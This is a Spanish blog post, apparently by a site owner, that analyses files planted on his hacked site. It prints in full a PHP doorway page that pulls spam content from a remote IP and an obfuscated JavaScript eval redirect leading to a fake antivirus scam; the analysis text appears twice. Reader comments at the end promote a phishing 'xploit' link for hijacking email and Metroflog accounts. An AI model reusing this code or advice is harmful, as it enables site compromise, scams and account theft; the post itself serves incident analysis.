29
Ago
El hacker que me trajo tráfico o nadie sabe para quien trabaja
Si bien al principio me desconcerté, porque alguien había entrado a mixelandia, luego revisando las propiedades de los archivos, me di cuenta de que los archivos habían sido creados 1 semana antes y que en las propiedades aparecía que pertenecían a mi usuario de ftp. La verdad esto no me extraña en nada, ya que últimamente varios de los sitios que teníamos hospedados en servage, han sufrido ese tipo de ataques, donde archivos de solo lectura para el usuario web, es decir que no es posible modificar esos archivos utilizando alguna vulnerabilidad en algún cms o sistema de bloggin como lo son drupal o MTOS, que son los que yo he tenido instalados.
Recordando un tiempo atrás, el primer sitio que fue atacado de esta
forma fue UBH, donde carmen recibió una advertencia de un usuario y
cuando vi que había pasado, resulto que el index y otros archivos
marcados con permisos 755, habían sido modificados, solo había una
explicación, entrar o por el administrador de archivos en línea que
proporciona servage o por la cuenta de FTP. Parece coincidencia que
unos días atrás servage había cambiado las contraseñas de FTP,
quisieras o no, esto para incrementar la seguridad, según versaba en la
página principal de servage. Además agregaron un sistema de Captcha al
login, cosa que veo realmente extraño, puesto que no es muy común que
en el login te pongan captcha. Por cierto esto fue un motivo suficiente
para que carmen decidiera abandonar por completo servage y mudarnos
para interhost. Desafortunadamente, yo no puedo costearme un servidor
dedicado, ni siquiera un VPS (Virtual Private Server) o Servidor
Privado Virtual que es en lo que esta en estos momentos UBH.
Tan solo una semana atrás, quien cayo fue Zerocracia, que al igual que UBH, fue modificado su index y otros archivos de javascript, que también era de solo lectura, y de nuevo no era posible que drupal los pudiera modificar.
Y ayer le toco el turno a Mixelandia, que si bien ya había sido hacheada una vez, fue por medio del foro, es decir phpBB, por lo que desde hace un buen lo quite, ya que solo trajo problemas.
Bien pero como no me iba a quedar nomás viendo, quite la carpetita que habían puesto y después me dije bueno si de todos modos va a llegar gente a esa URL, porque no aprovechamos ese trafico y lo mandamos a el index, así que por medio de un archivito .htaccess, estoy redirigiendo todo el trafico sin importar cual de todas la paginas maliciosas sea la que intentes visitar. Esto no solo hace que tenga más visitas, sino que además es benéfico para todos los que intentaron visitar esos links, la explicación a continuación.
Primeramente esta es la estructura que tiene la carpeta que crearon, es decir images que para poder tener la redirección, le cambie el nombre a images_.
Bien entonces empecemos a poner lo que contienen los archivos.
Pages.php
Solo es un Wrapper para el archivo blog.php
<?
include("../blog.php");
?>
Blog.php
Este archivo se encarga de recuperar algunos datos y construir la página de salida.
<?
if(!empty($_GET['p'])){ $id = intval($_GET['p']);
$ddir = 1;
if(!empty($ddir) and !empty($id)){
//ob_start();
$url = "http://89.149.217.230/content/2/".$id.".txt"; if(function_exists('curl_init')) { la funcion
$ch = curl_init(); //inicamos curl
@curl_setopt($ch, CURLOPT_URL, $url);
@curl_setopt($ch, CURLOPT_HEADER, 0);
@curl_setopt($ch, CURLOPT_POST, 0);
@curl_setopt($ch, CURLOPT_COOKIE, 0);
@curl_setopt($ch, CURLOPT_TIMEOUT, 15);
@curl_setopt($ch, CURLOPT_REFERER, $url);
@curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)");
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
$content = @curl_exec($ch);
$content = @explode("\n", $content);
curl_close($ch);
}else{
$content = @file($url); }
ob_start();
$pagetitle = @str_replace("<br>\n", "", $content['3']);
$out['page_title'] = $pagetitle;
for($fi=0;$fi<sizeof($content);$fi++){
echo $content[$fi]."<br>";
}
$out['content'] = ob_get_contents();
ob_end_clean();
ob_start();
@readfile("maplink.txt");
$out['map'] = ob_get_contents();
ob_end_clean();
include("../template.html");
}else{
header("HTTP/1.0 404 Not Found");
}
}else{
header("HTTP/1.0 404 Not Found");
}
?>
Ahora viene template.html, que es la que ya tiene la estructura de cómo saldrá en pantalla la página.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CLICK HERE! INFO ABOUT: <?=$out['page_title'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<?
<!-- iframe src="../a.html" border=0 style="position: absolute; left: 0px; top: 0px; height: 100%; width: 100%; padding: 0em; background-color: #FFFFFF; border: 0" align=center></iframe-->
?>
<table width="100%" border="0">
<tr>
<td valign="top" width="50%">
<?=$out['content'];?>
</td>
<td valign="top" width="50%">
<?=$out['map'];?>
</td>
</tr>
</table>
</body>
</html>
Como podemos ver se abre un iframe, el cual tiene como source el archivo a.html, asi que vamos a ver que tiene.
<script type="text/javascript"><!--
var s11="t";
var s12="o";
var s13="p";
var s16=".";
var s21="loca";
var s22="tion=";
var s31="'h";
var s32="t";
var s33="t";
var s34="p";
var s35="://";
var s36="por";
var s37="npis";
var s38="sing.";
var s39="net/s/";
var s40="in.cgi?2";
var s41="'";
eval(s11+s12+s13+s16+s21+s22+s31+s32+s33+s34+s35+s36+s37+s38+s39+s40+s41);
//-->
</script>
Bien pues la respuesta salta a la vista muy fácil, no hace falta mucho para comprender que lo que hace es que redirecciona a una dirección de un sitio que pareciera que es porno, tal vez por el nombre pornpissing.net. sin embargo cuando uno sigue el link, cosa que no recomiendo si no saben lo que están haciendo, se encuentra con que otra vez eres redireccionado a el sitio http://www.0scan.com/free/, en el que adivinen que hay.
Si en efecto otro bonito engaño de antivirus, claro entre mi antrivirus de verdad y noscript, no dejaron que nada de esto pasara a mayores. Tengo antivirus y no script, porque estoy en mi trabajo y aquí si tengo que usar Windows.
Ya no vamos a hacer muy largo el cuento, sin embargo casi todos los
links que apuntaban a esos archivos habían sido creados ayer y hoy 29,
así que nadie sabe para quien trabaja no lo creen
Saludos
Tan solo una semana atrás, quien cayo fue Zerocracia, que al igual que UBH, fue modificado su index y otros archivos de javascript, que también era de solo lectura, y de nuevo no era posible que drupal los pudiera modificar.
Y ayer le toco el turno a Mixelandia, que si bien ya había sido hacheada una vez, fue por medio del foro, es decir phpBB, por lo que desde hace un buen lo quite, ya que solo trajo problemas.
Bien pero como no me iba a quedar nomás viendo, quite la carpetita que habían puesto y después me dije bueno si de todos modos va a llegar gente a esa URL, porque no aprovechamos ese trafico y lo mandamos a el index, así que por medio de un archivito .htaccess, estoy redirigiendo todo el trafico sin importar cual de todas la paginas maliciosas sea la que intentes visitar. Esto no solo hace que tenga más visitas, sino que además es benéfico para todos los que intentaron visitar esos links, la explicación a continuación.
Primeramente esta es la estructura que tiene la carpeta que crearon, es decir images que para poder tener la redirección, le cambie el nombre a images_.
Bien entonces empecemos a poner lo que contienen los archivos.
Pages.php
Solo es un Wrapper para el archivo blog.php
<?
include("../blog.php");
?>
Blog.php
Este archivo se encarga de recuperar algunos datos y construir la página de salida.
<?
if(!empty($_GET['p'])){ $id = intval($_GET['p']);
$ddir = 1;
if(!empty($ddir) and !empty($id)){
//ob_start();
$url = "http://89.149.217.230/content/2/".$id.".txt"; if(function_exists('curl_init')) { la funcion
$ch = curl_init(); //inicamos curl
@curl_setopt($ch, CURLOPT_URL, $url);
@curl_setopt($ch, CURLOPT_HEADER, 0);
@curl_setopt($ch, CURLOPT_POST, 0);
@curl_setopt($ch, CURLOPT_COOKIE, 0);
@curl_setopt($ch, CURLOPT_TIMEOUT, 15);
@curl_setopt($ch, CURLOPT_REFERER, $url);
@curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)");
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
$content = @curl_exec($ch);
$content = @explode("\n", $content);
curl_close($ch);
}else{
$content = @file($url); }
ob_start();
$pagetitle = @str_replace("<br>\n", "", $content['3']);
$out['page_title'] = $pagetitle;
for($fi=0;$fi<sizeof($content);$fi++){
echo $content[$fi]."<br>";
}
$out['content'] = ob_get_contents();
ob_end_clean();
ob_start();
@readfile("maplink.txt");
$out['map'] = ob_get_contents();
ob_end_clean();
include("../template.html");
}else{
header("HTTP/1.0 404 Not Found");
}
}else{
header("HTTP/1.0 404 Not Found");
}
?>
Ahora viene template.html, que es la que ya tiene la estructura de cómo saldrá en pantalla la página.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CLICK HERE! INFO ABOUT: <?=$out['page_title'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<?
<!-- iframe src="../a.html" border=0 style="position: absolute; left: 0px; top: 0px; height: 100%; width: 100%; padding: 0em; background-color: #FFFFFF; border: 0" align=center></iframe-->
?>
<table width="100%" border="0">
<tr>
<td valign="top" width="50%">
<?=$out['content'];?>
</td>
<td valign="top" width="50%">
<?=$out['map'];?>
</td>
</tr>
</table>
</body>
</html>
Como podemos ver se abre un iframe, el cual tiene como source el archivo a.html, asi que vamos a ver que tiene.
<script type="text/javascript"><!--
var s11="t";
var s12="o";
var s13="p";
var s16=".";
var s21="loca";
var s22="tion=";
var s31="'h";
var s32="t";
var s33="t";
var s34="p";
var s35="://";
var s36="por";
var s37="npis";
var s38="sing.";
var s39="net/s/";
var s40="in.cgi?2";
var s41="'";
eval(s11+s12+s13+s16+s21+s22+s31+s32+s33+s34+s35+s36+s37+s38+s39+s40+s41);
//-->
</script>
Bien pues la respuesta salta a la vista muy fácil, no hace falta mucho para comprender que lo que hace es que redirecciona a una dirección de un sitio que pareciera que es porno, tal vez por el nombre pornpissing.net. sin embargo cuando uno sigue el link, cosa que no recomiendo si no saben lo que están haciendo, se encuentra con que otra vez eres redireccionado a el sitio http://www.0scan.com/free/, en el que adivinen que hay.
Si en efecto otro bonito engaño de antivirus, claro entre mi antrivirus de verdad y noscript, no dejaron que nada de esto pasara a mayores. Tengo antivirus y no script, porque estoy en mi trabajo y aquí si tengo que usar Windows.
Ya no vamos a hacer muy largo el cuento, sin embargo casi todos los
links que apuntaban a esos archivos habían sido creados ayer y hoy 29,
así que nadie sabe para quien trabaja no lo creenSaludos
Anónimo dijo:
hola a todos
pues no se que pedo con el tema pero para alguien
que quiera hackear metros y correos
os dejo un lanzador de xploit
1) hackear el correo
2) con la cuenta vas a la pag de metroflog
y le das olvidde contraseña y listo te llega
la contraseña a la bandeja y listo
dos pajaros de un tiro y pues ami me laten los
metros les dejo el link del lanzador
es : http://www.sparkclan.galeon.com/
Anonimo dijo:
como hacko un metro flog